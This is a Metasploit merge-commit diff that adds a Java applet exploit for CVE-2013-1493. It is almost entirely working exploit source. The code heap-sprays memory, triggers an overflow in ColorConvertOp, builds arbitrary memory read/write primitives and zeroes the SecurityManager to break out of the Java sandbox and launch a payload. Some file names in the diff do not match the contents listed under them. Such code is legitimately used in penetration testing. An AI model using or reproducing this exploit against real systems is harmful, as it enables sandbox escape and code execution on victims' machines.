Merge branch 'java_cmm' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-java_cmm

Author: sinn3r

data/exploits/cve-2013-1493/Init.class

@@ -0,0 +1,232 @@
+import java.applet.Applet;
+import java.awt.color.ColorSpace;
+import java.awt.image.BufferedImage;
+import java.awt.image.ColorConvertOp;
+import java.awt.image.ColorModel;
+import java.awt.image.ComponentColorModel;
+import java.awt.image.ComponentSampleModel;
+import java.awt.image.SampleModel;
+import metasploit.Payload;
+
+public class Init extends Applet {
+
+    private static final long serialVersionUID = 1L;
+    static final int ARRAY_MAGIC = -1341411317;
+    static final int ARRAY_OLDSIZE = 11;
+    static final int ARRAY_NEWSIZE = 2147483647;
+    static final int LEAK_MAGIC = -559035650;
+    static final int SPRAY_ARRAY_COUNT = 2808685;
+    static final int SPRAY_LEAK_COUNT = 2000000;
+    volatile Leak[] _sleaks;
+    volatile int[][] _sarrays;
+    volatile int[] _bigArray;
+    int[] _memBaseObj;
+    long _memBaseIdx;
+    long _memBasePtr;
+    int[] soffsets;
+    int[] doffsets;
+  
+  
+    public Init()
+    {
+        this.soffsets = new int[] { 0, 1, 2, 3 };
+        this.doffsets = new int[] { 0, 1, 2, 50000000 };
+    }
+
+    void spray() throws Exception
+    {
+        Runtime.getRuntime().gc();
+        Runtime.getRuntime().gc();
+
+        this._sleaks = new Leak[2000000];
+        this._sarrays = new int[2808685][];
+        try
+        {
+            for (int i = 0; i < this._sarrays.length; i++) {
+                this._sarrays[i] = new int[11];
+                for (int j = 0; j < this._sarrays[i].length; j++) {
+                    this._sarrays[i][j] = -1341411317;
+                }
+            }
+
+            for (int i = 0; i < this._sleaks.length; i++)
+                this._sleaks[i] = new Leak("L");
+        }
+        catch (OutOfMemoryError localOutOfMemoryError)
+        {
+        }
+    }
+
+    void getBigArray() throws Exception
+    {
+        for (int i = 0; i < this._sarrays.length; i++) {
+            for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
+                this._sarrays[i][j] = -1341411317;
+            }
+        }
+
+        for (int i = 0; i < this._sarrays.length; i++) {
+            if (this._sarrays[i].length != 2147483647) {
+                for (int j = 0; (j < this._sarrays[i].length) && (j < 22); j++) {
+                    if ((j > 0) && (this._sarrays[i][(j - 1)] != -1341411317) && (this._sarrays[i][j] == -1341411317)) {
+                        this._sarrays[i][(j - 1)] = 2147483647;
+                    }
+                }
+            }
+        }
+
+        for (int i = 0; i < this._sarrays.length; i++) {
+            if ((this._sarrays[i].length == 11) || (this._bigArray != null) || (this._sarrays[i].length != 2147483647))
+                continue;
+            this._bigArray = this._sarrays[i];
+        }
+
+        if (this._bigArray == null)
+            throw new Exception("fail");
+    }
+
+    long getAddress(Object obj) throws Exception
+    {
+        for (int i = 0; i < this._bigArray.length; i++) {
+            if (this._bigArray[i] == -559035650) {
+                int flag = 0;
+
+                for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = null;
+                    flag += (this._bigArray[(i + 1)] == 0 ? 1 : 0);
+
+                for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = "X";
+                    flag += (this._bigArray[(i + 1)] != 0 ? 1 : 0);
+
+                if (flag == 2) {
+                    for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = obj;
+                        return this._bigArray[(i + 1)];
+                }
+            }
+        }
+
+        throw new Exception("fail");
+    }
+
+    void getMemBase() throws Exception
+    {
+        for (int i = 0; i < this._sarrays.length; i++) {
+            for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
+                this._sarrays[i][j] = (j == 1 ? i : -1341411317);
+            }
+        }
+
+        for (int i = 0; i < this._bigArray.length; i++) {
+            if ((i > 0) && (this._bigArray[(i - 1)] != -1341411317) && (this._bigArray[i] == -1341411317) && (this._bigArray[(i + 1)] != -1341411317)) {
+                int len = this._bigArray[(i - 1)];
+                int idx = this._bigArray[(i + 1)];
+                if ((idx >= 0) && (idx < this._sarrays.length) && (this._sarrays[idx] != null) && (this._sarrays[idx].length == len)) {
+                    this._memBaseObj = this._sarrays[idx];
+                    this._memBaseIdx = i;
+                    break;
+                }
+            }
+        }
+
+        if (this._memBaseObj == null) {
+            throw new Exception("fail");
+        }
+
+        this._memBasePtr = getAddress(this._memBaseObj);
+
+        if (this._memBasePtr == 0L) {
+            throw new Exception("fail");
+        }
+
+        this._memBasePtr += 12L;
+    }
+
+    int rdMem(long addr)
+    {
+        long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
+        if ((offs >= 0L) && (offs < 2147483647L)) {
+            return this._bigArray[(int)offs];
+        }
+        return 0;
+    }
+
+    void wrMem(long addr, int value)
+    {
+        long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
+        if ((offs >= 0L) && (offs < 2147483647L))
+            this._bigArray[(int)offs] = value;
+    }
+
+    void privileged()
+    {
+        try
+        {
+            Payload.main(null);
+        } catch (Exception localException) {
+            //localException.printStackTrace();
+        }
+    }
+
+  
+    public void init()
+    {
+        try
+        {
+            if (System.getSecurityManager() == null) {
+                privileged();
+                return;
+            }
+
+            int sWidth = 168; int sHeight = 1;
+            int spStride = 4; int ssStride = spStride * sWidth;
+
+            int dWidth = sWidth; int dHeight = sHeight;
+            int dpStride = 1; int dsStride = 0;
+
+            ColorSpace scs = new MyColorSpace(0, this.soffsets.length - 1);
+            ColorModel scm = new ComponentColorModel(scs, true, false, 1, 0);
+            SampleModel ssm = new ComponentSampleModel(0, sWidth, sHeight, spStride, ssStride, this.soffsets);
+            BufferedImage sbi = new MyBufferedImage(sWidth, sHeight, 6, 0, scm, ssm);
+
+            for (int i = 0; i < ssStride; i++) {
+                sbi.getRaster().getDataBuffer().setElem(i, 1);
+            }
+
+            ColorSpace dcs = new MyColorSpace(0, this.doffsets.length - 1);
+            ColorModel dcm = new ComponentColorModel(dcs, true, false, 1, 0);
+            SampleModel dsm = new ComponentSampleModel(0, dWidth, dHeight, dpStride, dsStride, this.doffsets);
+            BufferedImage dbi = new MyBufferedImage(sWidth, sHeight, 10, 0, dcm, dsm);
+
+            ColorConvertOp cco = new ColorConvertOp(null);
+
+            spray();
+            try
+            {
+                cco.filter(sbi, dbi);
+            }
+            catch (Exception localException) { }
+            getBigArray();
+
+            getMemBase();
+
+            long sys = getAddress(System.class);
+            long sm = getAddress(System.getSecurityManager());
+            sys = rdMem(sys + 4L);
+            for (int i = 0; i < 2000000; i++) {
+                long addr = sys + i * 4;
+                int val = rdMem(addr);
+                if (val == sm) {
+                    wrMem(addr, 0);
+                    if (System.getSecurityManager() == null) {
+                        break;
+                    }
+                }
+            }
+            privileged();
+        }
+        catch (Exception localException1)
+        {
+        }
+    }
+
+
+}

data/exploits/cve-2013-1493/Leak.class

@@ -0,0 +1,14 @@
+class Leak
+{
+    public volatile int magic;
+    public volatile Object obj;
+    public volatile Object obj2;
+    public volatile Object obj3;
+    public volatile Object obj4;
+
+    public Leak(Object o)
+    {
+        this.magic = -559035650;
+        this.obj = o;
+    }
+}

data/exploits/cve-2013-1493/MyBufferedImage.class

@@ -0,0 +1,20 @@
+CLASSES = \
+	Init.java  \
+	Leak.java \
+	MyBufferedImage.java \
+	MyColorSpace.java
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.5 -target 1.5 -cp "../../../../data/java:." $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	mv Init.class ../../../../data/exploits/cve-2013-1493/
+	mv Leak.class ../../../../data/exploits/cve-2013-1493/
+	mv MyBufferedImage.class ../../../../data/exploits/cve-2013-1493/
+	mv MyColorSpace.class ../../../../data/exploits/cve-2013-1493/
+
+clean:
+	rm -rf *.class

data/exploits/cve-2013-1493/MyColorSpace.class

@@ -0,0 +1,49 @@
+import java.awt.image.BufferedImage;
+import java.awt.image.ColorModel;
+import java.awt.image.SampleModel;
+
+class MyBufferedImage extends BufferedImage
+{
+    int _fakeType;
+    ColorModel _fakeColorModel;
+    SampleModel _fakeSampleModel;
+
+    public MyBufferedImage(int width, int height, int imageType, int fakeType, ColorModel fakeColorModel, SampleModel fakeSampleModel)
+    {
+        super(width,height, imageType);
+
+        this._fakeType = fakeType;
+        this._fakeColorModel = fakeColorModel;
+        this._fakeSampleModel = fakeSampleModel;
+    }
+
+    public int getType()
+    {
+        String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
+        if (caller.contains("ICC_Transform.getImageLayout(")) {
+            return this._fakeType;
+        }
+
+        return super.getType();
+    }
+
+    public ColorModel getColorModel()
+    {
+        String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
+        if ((caller.contains("ICC_Transform.getImageLayout(")) || (caller.contains("CMMImageLayout.<init>("))) {
+            return this._fakeColorModel;
+        }
+
+        return super.getColorModel();
+    }
+
+    public SampleModel getSampleModel()
+    {
+        String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
+        if (caller.contains("ICC_Transform.getImageLayout(")) {
+            return this._fakeSampleModel;
+        }
+
+        return super.getSampleModel();
+    }
+}

external/source/exploits/cve-2013-1493/Init.java

@@ -0,0 +1,15 @@
+import java.awt.color.ColorSpace;
+
+class MyColorSpace extends ColorSpace
+{
+    private static final long serialVersionUID = 1L;
+
+    public MyColorSpace(int type, int numcomponents)
+    {
+        super(type,numcomponents);
+    }
+    public float[] fromCIEXYZ(float[] value) { return null; }
+    public float[] toCIEXYZ(float[] value) { return null; }
+    public float[] fromRGB(float[] value) { return null; }
+    public float[] toRGB(float[] value) { return null;    }
+}